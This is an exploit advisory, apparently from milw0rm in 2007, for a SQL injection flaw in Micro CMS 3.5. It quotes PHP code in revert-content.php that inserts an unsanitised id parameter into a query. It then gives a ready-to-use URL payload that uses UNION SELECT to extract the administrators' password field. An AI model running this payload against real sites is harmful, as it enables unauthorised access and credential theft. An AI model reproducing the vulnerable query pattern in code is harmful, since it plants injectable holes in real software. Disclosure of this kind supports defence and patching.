######################################################################################### # # not sec group # http://www.notsec.com info@notsec.com # # [Micro CMS 3.5] # # Class: SQL Injection # Found: 28/08/2007 # Remote: Yes # Site: http://www.impliedbydesign.com/ibd-micro-cms-static-content-manager.html # Download: http://www.impliedbydesign.com/apps/microcms/microcms.zip # Demo site: http://www.impliedbydesign.com/micro-cms-content-management-demo.php # Author: R00T[ATI] of notsec # Contact: r00t.ati@notsec.com - http://www.notsec.com # ######################################################################################### Vulnerable code: cms/revert-content.php ============================================================================================================ $sql = ' SELECT * FROM microcms_content_blurb_history WHERE content_blurbs_variable = "' . $_GET['id'] . '" ORDER BY content_blurb_history_version_num DESC LIMIT 1'; $result = mysql_query($sql); ============================================================================================================ Exploit : ============================================================================================================================================================================================ http://site.com/[micro_cms]/cms/revert-content.php?type=newest&id=1%22%20UNION%20ALL%20SELECT%20null,null,SUBSTRING(administrators_pass,1,16),null,null%20FROM%20microcms_administrators/* ============================================================================================================================================================================================ Thanks To: ========================= All notsec.com members; White_Sheep for Bugs Hunter; ========================= # notsec.com # milw0rm.com [2007-08-28]